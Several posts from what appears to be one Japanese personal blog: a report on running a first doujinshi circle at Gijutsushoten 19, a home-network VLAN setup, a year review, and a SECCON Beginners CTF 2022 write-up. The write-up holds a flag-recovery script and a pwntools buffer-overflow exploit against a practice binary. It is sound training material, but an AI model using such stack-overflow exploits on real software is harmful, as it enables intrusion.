お久しぶりです。

この度初めて同人誌を執筆し、技術書典19でサークル参加までしました。
せっかくなので熱が冷めないうちにサークル参加記としてブログにしたためようと思います。 そろそろ今年も終わりに近づいてきましたが、今年のハイライトと言っても過言ではない経験でした。 ちなみに売った本はこれです。刺さりそうだったらぜひお手にとってご覧下さい。 techbookfest.org

経緯

まず、同人誌を書こうと思ったのは...なぜか(ﾈｯﾄﾘ)
元々技術について本を書いて世に出すことに対して憧れがありました。 技術書典自体は継続的にチェックしていて、買った同人誌を楽しみつつも、「僕も書きたいんだよな〜つってもページ稼げるほどのネタがないしなぁ」というのを無限にやっていました。 そんなこんなで時は流れ2025年、日曜エンジニアの成果がまとまってきたので文書にしているとかなりの文量があることがわかりました。これは...ちゃんと練れば同人誌ってやつが書けるんじゃないか...と思い至ります。
その頃技術書典19のサークル募集が始まったので思い切って応募してみてやりきったという感じです。

マスタスケジュール

だいたいこんなスケジュールでした。

• 2~ 9月　ネタの仕込み（実装や検証、その記録）
• 9~10月　執筆
• 10~11月　書類審査や印刷所への入稿などのイベント準備

ネタの仕込みは結構構想段階から紆余曲折あり、考えるだけならもう少し前からぼんやり頭にはありました。 ネタの仕込み~執筆に関するこだわりなどは、別途技術書執筆自体の感想でも書こうと思います。 ここで書くと主題がぶれそうですし、何よりまだ技術書典はオンライン開催期間中です。 著者自らネタバレみたいな真似を率先して行ってもしょーもないですしね。

イベント準備

スケジュール

技術書典は電子版の用意が必須であり、電子版の審査もあります。
そのため、電子版の審査が通過し、売って問題ない書籍だと担保できたことを以て校了として、印刷所へ入稿しました。
運営側は「直前まで執筆を応援します！」と言ってくれてはいましたが、初参加...個人...同人誌執筆も初...リカバリーが効くか普通に怖い。
初参加なので既刊でお茶を濁すこともできないため、この新刊の準備がちゃんとできないことはすなわちイベジャーを意味します。
そういう不安もあって、結構真面目に手順を踏み、スケジュールはかなりのマージンも取りました。
今になって思えば、あと1週間くらいは執筆にかけてもよかったですが、印刷所の早期入稿割引との兼ね合いからすればこんなものでしょう。

1. サークル応募→当選
2. 電子版登録・書籍審査(オフライン1ヶ月前くらい)
3. 書籍審査通過・印刷所への入稿(オフライン3週間前くらい)
4. 技術書典サイトでの電子版の公開

サークル設営準備

これが困るわけです。何を準備していけばいいのかまるでわからん。
ただ技術書典運営は神で、テーブルクロスや新刊シール、カードスタンドなどさまざまな小物は準備してくれるんですね（しかも無料！）。
至れり尽くせりでありがてぇ...
これで最低限は揃うので、残りは自分のブースに要りそうなものを揃えます。

当日持っていって使ったもの

大体100均で買えますがブックスタンドは3Dプリンタで印刷しました。

• クリアブックカバー：見本誌の保護
• ブックスタンド：見本誌をおいておく
• おしながき、かんたん後払いQRコード（A4印刷）
• ポップスタンド：おしながきとQRコードを吊る
• ミニスタンド：残り部数の表示
• ホワイトボードマーカ：ミニスタンド記入用
• マスキングテープ ：クロスの固定など
• カッター：段ボールを開くため
• サインペン：おしながきに書き込み

事前にサークルごとに用意されているQRコードは少し小さいのでPOPスタンドで吊っていましたが、ほとんどのお客さんが正規(?)のQRコードを読んで決済をしていてあまり使われませんでした。
まぁ「かんたん後払いはこちら」というメッセージとともにQRコードだけ書いてある紙は怪しいですからね。まともなデザインが必要だったかもしれません。

おしながき作成に関してはCanvaが神でした。（本書の表紙もCanvaでつくっています）
最初はGoogle slideで描いていたもののセンスの欠如が果てしなく、安っぽすぎて頭を抱えていたところに、彗星のごとく現れてイケてる背景を一瞬で生成していきました。
実際に出来上がったものがこちら。

#技術書典 19のおしながきです。
日曜のオフライン会場では紙版も頒布します。
立ち読み・雑談も大歓迎なのでふらっとお立ち寄り下さいhttps://t.co/RcVO8lIdzs pic.twitter.com/zlmDnuiqpW

— さんらいふ (@5unl1fe3) November 14, 2025

書影と値段の他に本の紹介文を書こうと思ったのですがあんまり宣伝文句みたいなことを書くのは恥ずかしかったし、くどくど書くのも主義に反するのでシンプルにコンセプトだけ一言書いて、扱う技術要素を並べることにしました。 今回出した本は実装や検証で手を動かすタイプの同人誌であることは明らかなので、何を扱うのかがパッと見てわかった方が生きて素早く読者に届くと思ったからです。*1

そういう体験もあり、表紙やおしながきといったまず目に入るところでサボってはいけないというのは実感しました。
表紙もサイバー感があり、ディフェンス側の技術ということで硬派な印象でかっこよくなるように意識しましたしね。 おしながきをGoogle slideで絶望的なセンスのデザインでポスターを描いているときに「もうこれでいいかなぁ、いいよねぇ！？」となる中、頭の中でラーメンハゲが警鐘を鳴らしていました。

あったらよかったなーと思ったもの

• 現金対応のための電子版ダウンロードカード
• 名刺
• オタク

決済手段は技術書典の運営がアプリを用意し「かんたん後払い」という手段での決済が推奨されているのでこれでいっかと思っていました。
ほぼかんたん後払いを使っていただけたのであまり問題はなかったように思いますが、現金対応はあったほうがいいかもなぁと思いました。
今回、電子版は技術書典のサイトでしか扱っておらず、一方で紙だけの販売は技術書典サイトでは設定できません。
「紙本だけを紙+電子と同じ値段で売ってしまうのはいかがなものか...」とか色々考え、今回は準備が整わなかったので、「かんたん後払いのみ」としました。
技術書典と同じ媒体の「電子+紙」が現金でも払えると嬉しいですよね...。ダウンロードサイトの用意とかどうしたらいいんだろう...

続いて名刺です。ありがたいことに今回紙版は完売しているのですが、「増刷されたら知りたいので情報発信している媒体を教えてくれませんか？」と訪ねていただいたケースが数件ありました。
もはや用意することすら頭になかったのですが次回イベントに参加することがあれば持っていきます。
そしてオタクです。昼食も取らずに朝から夕方までほぼサークルブースにいたわけですが、最後は技術書典の来場者を信用しきって、ブースに1人しかいないにもかかわらず紙本完売後に技術書を物色するために離席しました。
店番くらい用意したほうがいいし昼食はとったほうがいい。

イベント当日

さてイベント当日、無事サークル参加者入場時間に間に合い、各サークルがブースの準備を始めました。 だんだん出来上がっていく周りの設営、そしてスタッフが見回りを始め準備できたサークルをチェックするあの「これからイベントが始まる」という雰囲気はとてもワクワク感に溢れていました。 僕が普段行くオタクイベンツも準備できていく過程はこんなワクワク感があるんだろうなとぼんやり思いながら設営していました。 そうそう、箱を開けた時、入稿した本が出来上がっているのを見たときは感動しました。
今回 ねこのしっぽさんに印刷をお願いしていたのですが、きれいに印刷してくれた上イベント会場まで運んでくれて大感謝です。

アホの感想だけど、本じゃん
(今回ISDNを取得したので裏表紙にバーコード載せたんだけど、目測を誤ってﾁｮｯﾄﾃﾞｶｲ) pic.twitter.com/nvRaJGnjVW

— さんらいふ (@5unl1fe3) November 16, 2025

個人、新刊のみ、設営もシンプルな物品のみだったので爆速で設営が終わり、周りのサークルの設営を見ていたんですが、やっぱり一般参加者のときとは視点が変わるので用意する物品など気づきが多かったですね。 次回参加のときは参考にしようと思う点がいっぱいありました。

そして参加者の入場時刻

「いやこれ売れんのかなぁ。周りのサークルが売れるのを見ながら自分のサークルだけずっと減らないとマジでいたたまれないよなぁ」と思ってましたし、実際売れ残らないように控えめな発行部数にして最悪自分で持ち帰ることができるようにデカいリュックで来ていました。自信がなさすぎる。200部も刷っていませんが、僕の前に積まれた同人誌の束は、カンヤ祭で古典部が用意してうず高く積まれた氷菓の束に見えていました。

開始から30分経った頃、「あれ、案外売れてね？」となりもう一束を机に並べます。
その後も割と売れていく...よかった、ワイワイ感から疎外されたサークルになっていない...。と安心していたのですが、1時間もすると「あ、やべえこれ紙版絶対足りない」という確信めいた逆方向の不安がやってきました。
想定外の売れ行きに、残り部数をツイートする間もなく、2時間で完売してしまいました。マジ！？
余る方は予想していたんですが足りない方は本当に全く予想していなかったので、あまりに予想外のできごとを前に「その場で印刷とかできないかなぁ」などと支離滅裂な思考を働かせている間にもブースには来場者がやってきます。
多くの人に求められて嬉しい反面、売れ行き予測が悲観的すぎたことで需要に答えられなかったのが申し訳なくなってきました。
その他にも見本誌を読んでいった方から非常に嬉しい感想をいくつもいただいて、ちゃんと人に刺さるものになっていたんだという実感が徐々に湧いてきました。
名刺が要るなと思ったのもこのあたりからです。ついでにいうと自分のホームページとかがあればいいと思ったので、github pagesでも使ってサイト作るかなどと思っています。

そしてイベント終了。
物理本は完売、デカリュックできたのも杞憂に終わり足取りもリュックの中身も軽く会場を後にしかけたところで、技術書店がまだ空いているのを見つけたので、滑り込みで気になっていたラムダノートさんの書籍を購入して帰りました。 自サークルの周囲の技術書は数冊物色できましたが、遠い島は撤収していたり、無人電子販売をしている自分のスペースが気になってすぐ帰ったりを繰り返していて満喫できませんでした。ぐぬぬ......

技術書店ひ滑り込んでラムダノートさんの本を買って、キラシールとかわいいシールをもらった！ pic.twitter.com/77PUyXx7IQ

— さんらいふ (@5unl1fe3) November 16, 2025

おわりに

まずなにより、自分で書いた技術書を売って反応がもらえるのは超楽しかったです。なんというか自分も生産者としてお祭りに一枚噛めた気がして充実感がありました。
そして、準備を整えてくれた運営や印刷所、ブースにきて反応をくれた読者のみなさん、ありがとうございました！
好意的なコメントが嬉しすぎたので忘れないよう一部ブログに残しておくと、「自宅につくるというコンセプトが良くて、実際手元に作れると楽しそう」「読み通したら勉強になりそうなのでチャレンジしてみたい」「あんまりこういうことやっている解説は見ないからすごい」「(紙本完売後に)実際的だし人気が出るのがわかる。増刷してほしい」という声をいただきました。嬉しすぎる(大事なことなので2回言う)。
自分でコンセプトから決めて技術検証して書き上げた本が数多のオタクに評価してもらえるというのは自信になりますね。
今回は結構渾身の一撃というか、個人的には割と厳し目に見てよーーく練ってからつくった本だと思っているので、同じくらいリソースを傾けてなおかつ人に刺さる本にできるかわかりませんが、新刊を作るモチベになりました。
なにより、自分の技術を本にして売るのはたのしい！！
近いうちに新刊作ってまた出たいなーと思っています。（ちゃんとできあがれば既刊も増刷して持っていきたいです。）
それでは。記事公開現在まだまだ技術書典19は開催中なので、よき技術同人ライフを！

エピローグ：納本編

さて、オンラインマーケットはまだまだ開催中なわけですが、本書も例によって国会図書館に納本をしに行きました。*2
これで会場にきていなかった人でも見本誌を閲覧できるってわけです。
ちなみに技術書を出した理由の半分です。 まぁそれが冗談だとしても、納本したかったからこそ、様になるように本のクオリティを上げようとする努力ができたってもんです。
黒歴史は半永久的に保存するに限るし、そもそも義務となっているのでね。
納本制度の概要｜国立国会図書館―National Diet Library

「もし私がいなくなっても、同人誌は残るからさ」
君の言葉が、インターネットの海にこだまし続けている──*3

おうちネットワークをアップデートしよう！

普段こういうのは個人用のHackMDとかに残しているんだけど、ｶﾞｯｯとやってしまったので思い出しつつブログにしてみる。アップデートというほどアップデートでもないのだけどスイッチをいじって思い通りに動いたのが結構楽しかった。

要件

• 普段利用のLANとラボ用のLANがほしい

• ラボ用のLANからはインターネットアクセスを禁じられるようにしたい

• ラボ用のLANのインバウンドはどのLANからも許可したい

とこんなもんである。複雑なことをやるつもりはあまりない。いきなり色々やろうとして理解の範疇を超える黒魔術をしていると後で痛い目を見るのでミニマルスタートで。

ところで何買ったの

Catalyst3560-CX 8ポートです。Ciscoのスイッチといえば紺というか濃青緑(？)のもあるけど白のほうが見た目が好みだった。趣味なのでモチベを上げる色や形にすることは大事。

www.cisco.com

構成

[ONU] -> [Router] -> [L3SW] -> [PCs] よくあるホームネットワークです。いままではルータからPCなどへ直つなぎだったのをL3SWで諸々制御する目論見です。

設定投入

それではやっていき。まぁだいたいこう設定をすればいいだろうという案はこんな感じ

• ルーティングの有効化
• telnetの有効化
• NTPの設定
• VLANの設定

これで各VLANに属するホストがデフォゲをSVIにむければVLAN間ルーティングができる。
次はインターネットアクセス用の要件。ラボネットワークからはインターネットアクセスを禁じたいとは言ったものの、まぁインターネットアクセス自体はできるようにしておいてACLで制御すればいいよな...と思ってとりあえずすべてのVLANからインターネットアクセスできるようにすることを考えていたけど、今のルータを使っているうちはできなさそうな気がしたので諦めた。スタティックルートは流石に切れるよな⋯と思って色々管理画面を見てみたが  


ぼく「サブインターフェースあります？」  
ルータ「それはないですね」  
ぼく「了解。まぁそうっすよね、じゃスタティックルート切れますか？」  
ルータ「そこになければないですね」    


...ルータってなんだっけ(´・ω・｀)


ルータはインターネット向け1レーンバケツリレー装置とみなして設定をしなければならないので、いろいろ考え中⋯   

 



# まとめ/感想
使えるものはできたのでいいかなといったところです。ラボ環境のアップデート系のサムシングがあると面倒だよなぁなどと思って、中継用のホストを建てるか、まともなルータ（FWとかでもいいかも？と思いつつ）を導入することも考えつつ、次の構成を考えるネタにもなって実質プラス。これをやる過程でL3SWのアーキテクチャやルーティングの仕組み、ACLのin out の概念、ホスト側でいうと今までルータのDHCPに頼りきりだったのをホストで固定IPを降る方法などいまさら聞けない系の設定を学ぶことができた。
失敗系の話でいうと、一番しょーもないのはホームLANからインターネットアクセスできなくなってしまって相当焦ったんですがルーティングを有効化していなかったりした。  
あと、VLAN間ルーティングができなくなったときにtracerouteで調べると、別のVLANのSVIへルーティングされず、ルータへルーティングされているので「なんで〜」っていってたら、普通にデフォゲをSVIにしておらず、別のVLANに送りたいicmpがインターネットの彼方へすっとんでいたりした。   
なんやかんや、こうして欲しい環境に合わせて色々わかった上で設定投入して実現させるとこまでできて初めて経験として消化できるなぁと思った。スイッチの使い方としてはかなりベーシックな機能しか使っていないと思うし、コンフィグレーションガイドを見ると他にも色々設定すると面白そうな内容が乗っている。まだまだ週間おうちネットワークは創刊号だし電力と相談して色々環境を整えていきたいところ。  

1月

この辺は研究に忙殺されている。審査会、公聴会の準備と並行して修論を執筆していた...。

2月

修論提出&公聴会DONE。修論の優秀賞をゲット。
やっと少し余裕ができたので、衛星のOSについてThink & Writeを再開していた。
github actionsを触り始め、何度も繰り返すテストはこれでやるようにしてみたりと開発環境にも思いを馳せることに。

3月

修論の修正をして最終版を提出して無事修了。優秀賞をとったので景品をゲットした。
ヒッコシングなど労働者になるための手続きに奔走

4月

労働者となり、今まで目を向けていなかった領域の技術に手を出さなければならなくなったのでこんなことをして遊んでみていた

• SQLも書けない有様だったのでMariaDBをPCに構築する遊びを同期とやってみてSQLを書く練習をする
• rustlingsを始める。趣味のパソカタをしていたら余った、使い方に困るちょっとした時間でこの頃からちまちま進め始めた

5月

ニコニコ超会議に行ってISTのロケットを見る。話を直接聞けて、部品もいっぱい見られてかなり面白かった。
まさかニコ超でロケットが見られるとは思ってなかった。

他のブースも見て回ったけどインターネット文化を感じられてとても良かった。
あとニコニコ技術部のファミコンを楽器にしてるやつを生で見られて感動

(あとバンナムフェス行った。リアルライブめちゃくちゃ久しぶりで楽しかったです。感覚ピエロのBtD忘れません)

6月

ネットワークに入門するために、とりあえず安いL3SW買った。
24ポートは普通に持て余してるのでなんか遊びたい任意のオタクは声かけてください。
ネットワーク入門もなんだけど、スイッチを分解して中を見てオシロとかで信号を見てみたい思いがあるので分解に関心があるオタクも声かけてください。

あと、はやぶさが持ち帰ったサンプルがあると聞いてISASに行ってきた。
サンプルはごく微量でルーペを通して見るようになっており、予備知識無しじゃただの砂にしか見えないが、かなりアクロバットなミッションシーケンスだと感じていたのもあって、これを持ち帰る過程に思いをはせてなんとなく感慨深くなった。

7月

カーネルハックに関心が沸いてきたので、とりあえずLinuxカーネルをビルドしてQEMUで動かしてみるなどしていた。(これも進めなきゃだな...)
(SUNRICH COLOURFUL1日目には行ったのですが、2日目に全員集合M@STERPIECEが来てて膝から崩れ落ちました。ショックでムビマスの円盤とマスピのＣＤとスタマス買いました)

8月

修論をjournalに出していたところacceptされた。
少し前からなんとなくその気配を感じていたので、7月半ばからは研究に使用していたソースコードをpublicリポジトリにすべく整備し始めていた。 「進捗>>コードの質」の思想の下3年熟成されたいきあたりばったりなコードなので完成度がかなり低く「ちゃんとやりたいなら1から書き直せこんなもん」状態だったが、「一応使っていたものと近い状態で残しとこうかな...」と思い結局入出力部だけ軽くメンテしただけになった。 どう考えても数値計算をソフトウェアの書き方とともに学ばないのは損失だと常々考えていたが、実際本格的にメンテしようとしたらすでに酷いことになっていたので（これは自業自得）、数値計算のソフトウェアを書くには事前に何を考えなければならないかを反省してブログにブチ上げた。動くコードと、数値計算ソフトウェアの作り方に対する私見を放出したのでやりきった感...。

もうひとつ、HTTPが基礎から何もわからんかったので、VMでプロキシを立ててHTTP/HTTPSの通信を中継させて、HTTPSの場合は内容が見られるように設定してみる、というのをやった。内部が見える仕組みを構築してみると理解が進むね...。

9月

MFTに初参戦。
めちゃくちゃ刺激になった。面白いと思ったものを書き連ねていくとキリがなくなるので書かないけど、「やっぱちゃんとモノ作りてぇよな」と思った。

あとここでSpresenseの革新周りの話を聞いた。月面ローバーも頑張ってください

10月

部屋のアップグレードのためのムーブに奔走（部屋はよく考えましょう）

11月

部屋のアップグレード完了

• L字デスクになりました✌ （広くて快適、これで基板やらを広げても問題ない机上スペースを手に入れたので開発やっていこう！）

ちまちまやっていたrustlings完走しました（長い）

12月

机上スペースを手に入れたので開発やっていこう！

某感染症で2週間オワオワリになっていました。（かなしい）

その他部屋のアップグレードに伴う小物の調達に奔走。暮らすって物入りね...(魔女並みの感想)

総評

色々見に行って刺激を受けたものの、何かモノとして成した物体がないので来年は何か完成させることを目標にしたいですね。
そのための環境の用意にも奔走したわけですし。

SECCON beginners CTF2022に参加したので、そのことを書いていきます。

主旨

CTFを解く時、あとから振り返ると「なんでここできたんだ？」みたいになりがちで一生ワナビーみたいな気分がして悔しいので、問題を見たときに何を考えていたのか、その考えの何が間違っていたのかを記録して復習することにしました。そこでwriteupというよりは考える過程を記録して復習の材料にしたり、アンチパターンにしたいと思います（テストの訂正ノートのようなものです）。考えていたことをいちいち書き起こしているのでやや冗長になっています。なお、自分が関心のあるジャンルはreverseとpwnでこれらの問題を中心に解いたので、cryptoとwebについては記載しておりません。

取り組んだ問題

Quiz(Reversing)(振り返りの余地がないので割愛)
Recursive(Reversing)
beginnersBof(Pwnable)
raindrop(Pwnable)

reversing

Recursive

突然フラグを聞かれて回答して間違ってるぞと言われます（それはそう）。まずは内部でどんな処理をしているのか追っていきます。まずはghidraでデコンパイルして概要を掴みます。mainでフラグの入力を要求されたあとはcheck関数に入り、checkは再帰的に呼び出されることがわかりました。ちなみにGhidraによるcheck関数のデコンパイル結果はこちら

undefined8 check(char *param_1,int param_2)

{
  int iVar1;
  int iVar2;
  int iVar3;
  size_t sVar4;
  char *pcVar5;
  
  sVar4 = strlen(param_1);
  iVar3 = (int)sVar4;
  if (iVar3 == 1) {
    if (table[param_2] != *param_1) {
      return 1;
    }
  }
  else {
    iVar1 = iVar3 / 2;
    pcVar5 = (char *)malloc((long)iVar1);
    strncpy(pcVar5,param_1,(long)iVar1);
    iVar2 = check(pcVar5,param_2);
    if (iVar2 == 1) {
      return 1;
    }
    pcVar5 = (char *)malloc((long)(iVar3 - iVar1));
    strncpy(pcVar5,param_1 + iVar1,(long)(iVar3 - iVar1));
    iVar3 = check(pcVar5,iVar1 * iVar1 + param_2);
    if (iVar3 == 1) {
      return 1;
    }
  }
  return 0;
}

また、checkの戻り値が1だとincorrectになることがわかるので、そうならないための条件を探します。この様子では最終的にtable[param2] == *param1であれば0を返してくれそうです。しかし、そもそもフラグを出力してくれそうな処理が一つもありません。ここで、「何らかの方法でこのバイナリファイルの中にあるtable[param2]の内容を読み出しさえすればいいのでは」という方針が立ちます。ではGDBで解析していきます。最初に考えたのはcheck関数とif(table[param2] == *param1)の判定を行うところにブレークポイントを張って実行し、レジスタ値などを書き換えながら実行を進め、incorrectにならないようにtableの内容を読み出していくという方法です。 ここで少し脇道にそれますが、checkに入ったところでディスアセンブルしてcheck関数の中身を見ると、tableのアドレスが書いてあります。

(gdb) disas
Dump of assembler code for function check:
   0x0000555555555280 <+0>:   endbr64 
   0x0000555555555284 <+4>:   push   rbp
   0x0000555555555285 <+5>:   mov    rbp,rsp
   0x0000555555555288 <+8>:   sub    rsp,0x30
   0x000055555555528c <+12>:  mov    QWORD PTR [rbp-0x28],rdi
   0x0000555555555290 <+16>:  mov    DWORD PTR [rbp-0x2c],esi
   0x0000555555555293 <+19>:  mov    rax,QWORD PTR [rbp-0x28]
   0x0000555555555297 <+23>:  mov    rdi,rax
   0x000055555555529a <+26>:  call   0x5555555550d0 <strlen@plt>
   0x000055555555529f <+31>:  mov    DWORD PTR [rbp-0x1c],eax
   0x00005555555552a2 <+34>:  cmp    DWORD PTR [rbp-0x1c],0x1
   0x00005555555552a6 <+38>:  jne    0x5555555552d1 <check+81>
   0x00005555555552a8 <+40>:  mov    eax,DWORD PTR [rbp-0x2c]
   0x00005555555552ab <+43>:  cdqe   
   0x00005555555552ad <+45>:  lea    rdx,[rip+0x2d6c]        # 0x555555558020 <table>

横着しようとしてここのデータの読み出しを実行してみたのですが、なんとなくフラグっぽい文字列が見えます。

(gdb) x/s 0x555555558020
0x555555558020 <table>:   "ct`*f4(+bc95\".81b{hmr3c/}r@:{&;514od*<h,n'dmxw?leg(yo)ne+j-{(`q/rr3|($0+5s.z{_ncaur${s1v5%!p)h!q't<=l@_8h93_woc4ld%>?cba<dagx|l<b/y,y`k-7{=;{&8,8u5$kkc}@7q@<tm03:&,f1vyb'8%dyl2(g?717q#u>fw()voo$6g):)_"...

ここでフラグっぽいが明確に違う文字列が出てくるのでcheck関数の再帰呼び出しと条件式について再考することになります。ここで何すればいいんだろう...となりましたが手か足は出していきます(gdbでブレークポイントをむちゃくちゃ張って、レジスタを書き換えて処理を進める虚無作業など活動を多岐に渡る...。)すると、そもそもparam1はcharなので1文字ですから、文字列の中から毎回1文字ずつ取得して検証しているよねということが先程考えたgdbでいちいち条件分岐に使われる値を読み出していく作業をしているうちにわかりました（遅い）。では、「checkを再実装してif(table[param2] == *param1)のタイミングで1文字ずつ出力すればよい」という考えに至ります。tableの中から文字列が取得されることはわかっており、デコンパイルしてアルゴリズムもわかっていますからあとは書くだけです。tableの内容についてはghidraの出力結果をコピペしていらない部分をちまちま消しました。再実装にあたってghidraのデコンパイル結果と書き味が違う点は2点です。再実装はtableの中から正解の文字列を探すのが目的で、正解を出力させる行為なのでバリデーションの必要がありません。したがって、iVar3==1のときは文字の出力だけさせてif文を抜けます。すると勝手にreturn 0してくれるのでわざわざifブロックにreturn文も書きません、ここが1点目。もう1点はelse内で実行するcheck関数をif文に組み込んだ点です。5億年ぶりにpythonを書いたため非常に下手くそな書き方になってしまった感がありますが一応フラグが出力されます。

table = [0x63,    0x74,　0x60, 0x2a,  0x66,  0x34,  0x28,  0x2b,
0x62,  0x63,  0x39,  0x35,  0x22,  0x2e,  0x38,  0x31,
0x62,  0x7b,  0x68,  0x6d,  0x72,  0x33,  0x63,  0x2f,
0x7d,  0x72,  0x40,  0x3a,  0x7b,  0x26,  0x3b,  0x35,
0x31,  0x34,  0x6f,  0x64,  0x2a,  0x3c,  0x68,  0x2c,
0x6e,  0x27,  0x64,  0x6d,  0x78,  0x77,  0x3f,  0x6c,
0x65,  0x67,  0x28,  0x79,  0x6f,  0x29,  0x6e,  0x65,
0x2b,  0x6a,  0x2d,  0x7b,  0x28,  0x60,  0x71,  0x2f,
0x72,  0x72,  0x33,  0x7c,  0x28,  0x24,  0x30,  0x2b,
0x35,  0x73,  0x2e,  0x7a,  0x7b,  0x5f,  0x6e,  0x63,
0x61,  0x75,  0x72,  0x24,  0x7b,  0x73,  0x31,  0x76,
0x35,  0x25,  0x21,  0x70,  0x29,  0x68,  0x21,  0x71,
0x27,  0x74,  0x3c,  0x3d,  0x6c,  0x40,  0x5f,  0x38,
0x68,  0x39,  0x33,  0x5f,  0x77,  0x6f,  0x63,  0x34,
0x6c,  0x64,  0x25,  0x3e,  0x3f,  0x63,  0x62,  0x61,
0x3c,  0x64,  0x61,  0x67,  0x78,  0x7c,  0x6c,  0x3c,
0x62,  0x2f,  0x79,  0x2c,  0x79,  0x60,  0x6b,  0x2d,
0x37,  0x7b,  0x3d,  0x3b,  0x7b,  0x26,  0x38,  0x2c,
0x38,  0x75,  0x35,  0x24,  0x6b,  0x6b,  0x63,  0x7d,
0x40,  0x37,  0x71,  0x40,  0x3c,  0x74,  0x6d,  0x30,
0x33,  0x3a,  0x26,  0x2c,  0x66,  0x31,  0x76,  0x79,
0x62,  0x27,  0x38,  0x25,  0x64,  0x79,  0x6c,  0x32,
0x28,  0x67,  0x3f,  0x37,  0x31,  0x37,  0x71,  0x23,
0x75,  0x3e,  0x66,  0x77,  0x28,  0x29,  0x76,  0x6f,
0x6f,  0x24,  0x36,  0x67,  0x29,  0x3a,  0x29,  0x5f,
0x63,  0x5f,  0x2b,  0x38,  0x76,  0x2e,  0x67,  0x62,
0x6d,  0x28,  0x25,  0x24,  0x77,  0x28,  0x3c,  0x68,
0x3a,  0x31,  0x21,  0x63,  0x27,  0x72,  0x75,  0x76,
0x7d,  0x40,  0x33,  0x60,  0x79,  0x61,  0x21,  0x72,
0x35,  0x26,  0x3b,  0x35,  0x7a,  0x5f,  0x6f,  0x67,
0x6d,  0x30,  0x61,  0x39,  0x63,  0x32,  0x33,  0x73,
0x6d,  0x77,  0x2d,  0x2e,  0x69,  0x23,  0x7c,  0x77,
0x7b,  0x38,  0x6b,  0x65,  0x70,  0x66,  0x76,  0x77,
0x3a,  0x33,  0x7c,  0x33,  0x66,  0x35,  0x3c,  0x65,
0x40,  0x3a,  0x7d,  0x2a,  0x2c,  0x71,  0x3e,  0x73,
0x67,  0x21,  0x62,  0x64,  0x6b,  0x72,  0x30,  0x78,
0x37,  0x40,  0x3e,  0x68,  0x2f,  0x35,  0x2a,  0x68,
0x69,  0x3c,  0x37,  0x34,  0x39,  0x27,  0x7c,  0x7b,
0x29,  0x73,  0x6a,  0x31,  0x3b,  0x30,  0x2c,  0x24,
0x69,  0x67,  0x26,  0x76,  0x29,  0x3d,  0x74,  0x30,
0x66,  0x6e,  0x6b,  0x7c,  0x30,  0x33,  0x6a,  0x22,
0x7d,  0x37,  0x72,  0x7b,  0x7d,  0x74,  0x69,  0x7d,
0x3f,  0x5f,  0x3c,  0x73,  0x77,  0x78,  0x6a,  0x75,
0x31,  0x6b,  0x21,  0x6c,  0x26,  0x64,  0x62,  0x21,
0x6a,  0x3a,  0x7d,  0x21,  0x7a,  0x7d,  0x36,  0x2a,
0x60,  0x31,  0x5f,  0x7b,  0x66,  0x31,  0x73,  0x40,
0x33,  0x64,  0x2c,  0x76,  0x69,  0x6f,  0x34,  0x35,
0x3c,  0x5f,  0x34,  0x76,  0x63,  0x5f,  0x76,  0x33,
0x3e,  0x68,  0x75,  0x33,  0x3e,  0x2b,  0x62,  0x79,
0x76,  0x71,  0x23,  0x23,  0x40,  0x66,  0x2b,  0x29,
0x6c,  0x63,  0x39,  0x31,  0x77,  0x2b,  0x39,  0x69,
0x37,  0x23,  0x76,  0x3c,  0x72,  0x3b,  0x72,  0x72,
0x24,  0x75,  0x40,  0x28,  0x61,  0x74,  0x3e,  0x76,
0x6e,  0x3a,  0x37,  0x62,  0x60,  0x6a,  0x73,  0x6d,
0x67,  0x36,  0x6d,  0x79,  0x7b,  0x2b,  0x39,  0x6d,
0x5f,  0x2d,  0x72,  0x79,  0x70,  0x70,  0x5f,  0x75,
0x35,  0x6e,  0x2a,  0x36,  0x2e,  0x7d,  0x66,  0x38,
0x70,  0x70,  0x67,  0x3c,  0x6d,  0x2d,  0x26,  0x71,
0x71,  0x35,  0x6b,  0x33,  0x66,  0x3f,  0x3d,  0x75,
0x31,  0x7d,  0x6d,  0x5f,  0x3f,  0x6e,  0x39,  0x3c,
0x7c,  0x65,  0x74,  0x2a,  0x2d,  0x2f,  0x25,  0x66,
0x67,  0x68,  0x2e,  0x31,  0x6d,  0x28,  0x40,  0x5f,
0x33,  0x76,  0x66,  0x34,  0x69,  0x28,  0x6e,  0x29,
0x73,  0x32,  0x6a,  0x76,  0x67,  0x30,  0x6d,  0x34]
flagIdx = []
dummy = 'a'*0x26
flag = []

def check(param1, param2):
  global flag
  iVar3 = len(param1)
  if iVar3 == 1:
    flag.append(table[param2])
  else :
    iVar1 = int(iVar3/2)
    if not check(param1[:iVar1], param2):
      return False
    if not check(param1[iVar1:],iVar1 * iVar1 + param2):
      return False
  return True

check(dummy,0)

print("Result length: " + str(len(flag)))
answer = ""
for i in flag:
  hoge = i.to_bytes(2,'big')
  answer += hoge.decode('ASCII')
print("Flag: "+answer)

pwnable

beginnersBof

典型的なBOFです。まずは配布されたsrc.cから脆弱性っぽいものを探していきます。具体的には値をfgetsなどでコピーしているような処理です。すると29行目にfgetsがあります。さらに、ここには記載していませんがソースコード全体を読めばflag.txtをopenして内容をreadして出力するwin関数があります。

int main() { //src.c
    int len = 0;
    char buf[BUFSIZE] = {0};
    puts("How long is your name?");
    scanf("%d", &len);
    char c = getc(stdin);
    if (c != '\n')
        ungetc(c, stdin);
    puts("What's your name?");
    fgets(buf, len, stdin);
    printf("Hello %s", buf);
}

ここまでの情報で「"How long is your name" と聞かれたらスタックサイズを超える容量を指定し、nameの入力によりターンアドレスに該当する領域にwin関数のアドレスを書き込めばいけるはず」という方針が立ちます。となればやることは何バイト埋めればよいかの特定とwin関数のアドレスの特定です。gdbを立ち上げディスアセンブルします。

(gdb) disas
Dump of assembler code for function main
   0x0000000000401263 <+0>:     push   rbp
   0x0000000000401264 <+1>:     mov    rbp,rsp
   0x0000000000401267 <+4>:     sub    rsp,0x20

なんとなくスタックサイズが0x20っぽそうなので、rbpの大きさの0x8を足して、0x28 byteだけ埋めれば次はwin関数のアドレスを入れればリターンアドレスの書き換えができてwin関数を呼んでくれるはずという推測のもとできたプログラムがこちら。（ちなみに、ちゃんとやるならディスアセンブルの結果を見て、ダミーを書き込むbufの先頭アドレスを確認してからオフセットを計算するべきなはずです多分）

from pwn import *

binfile = './chall'
e = ELF(binfile)

#pc = connect('beginnersbof.quals.beginners.seccon.jp',9000)
pc = process("./chall")

pc.sendlineafter(b"name?\n",b"50")

payload = b'A'* 0x28
payload += p64(e.symbols["win"])

pc.sendlineafter(b"name?\n" ,payload)

pc.interactive()

raindrop

#define BUFF_SIZE 0x10

void help() {
    system("cat welcome.txt");
}

